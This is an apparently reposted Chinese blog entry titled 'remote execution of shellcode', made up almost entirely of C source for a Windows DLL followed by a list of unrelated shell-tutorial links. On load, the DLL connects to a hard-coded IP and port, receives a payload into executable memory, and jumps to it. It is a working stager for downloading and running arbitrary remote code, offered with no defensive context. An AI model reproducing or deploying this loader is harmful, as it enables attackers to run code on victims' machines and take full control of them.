远程执行shellcode
2016-06-13 10:21
417 查看
#include "Windows.h"
#include <WinSock2.h>
#include <stdio.h>
#pragma comment(lib,"WS2_32.lib")
int shellcode_execute()
{
WSADATA wsData;
if(WSAStartup(MAKEWORD(2,2),&wsData))
{
printf("WSAStartp fail.\n");
return 0;
}
SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0);
SOCKADDR_IN server;
ZeroMemory(&server,sizeof(SOCKADDR_IN));
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip
server.sin_port = htons(8888); //server port
if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server)))
{
printf("connect to server fail.\n");
closesocket(sock);
WSACleanup();
return 0;
}
u_int payloadLen;
if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen))
{
printf("recv error\n");
closesocket(sock);
WSACleanup();
return 0;
}
char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
char* buffer = orig_buffer;
int ret = 0;
do
{
ret = recv(sock,buffer,payloadLen,0);
buffer += ret;
payloadLen -= ret;
} while (ret > 0 && payloadLen > 0);
//执行shellcode
__asm
{
mov edi,sock;
jmp orig_buffer;
}
VirtualFree(orig_buffer,0,MEM_RELEASE);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
shellcode_execute();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Shell命令
- 使用shell实现对xml文件的指定字段进行修改,默认替换成当时的时间戳
- [Android]使用BeanShell实现Android简易科学计算器
- HBase 常见Shell命令总结
- shell变量的简单说明
- 浅谈shell—eval
- shell 基础 $(cd `dirname $0`;pwd)
- shell 脚本
- shell实现ftp命令示例
- Shell 字符串、数字、文件判断
- Xshell无法连接Ubuntu,但能够ping通虚拟机
- shell基础
- Shell命令速查
- Shell中命令替换$(...)与后置引用`...`的区别与联系
- Linux Shell系列教程之(九)Shell判断 if else 用法
- Powershell学习之道-文件夹共享及磁盘映射
- shell脚本摘要
- mac环境变量设置
- Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数
- Shell中条件判断if中的各种参数的意思